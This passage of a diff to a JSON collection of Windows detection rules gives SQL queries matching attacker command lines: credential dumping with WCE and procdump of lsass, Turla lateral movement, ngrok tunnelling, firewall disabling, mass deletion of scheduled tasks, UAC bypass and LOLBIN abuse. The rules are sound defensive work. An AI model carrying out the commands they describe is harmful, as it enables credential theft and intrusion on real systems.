ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1557.001" + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Unlikely" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Turla Group 
Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" 
], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE 
'\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "Suspicious 
Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE 
'%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. 
This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "IIS Native-Code Module Command Line Installation", + "id": 
"9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "description": "Detects suspicious IIS native-code module installations via command line", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' 
ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.t1489" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' 
AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "title": "Suspicious Tasklist Discovery Command", + "id": "63332011-f057-496c-ad8d-d2b6afb27f96", + "status": "test", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "author": "frack113", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_tasklist_basic_execution.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "status": 
"experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", + "status": "test", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", - "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1218" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs 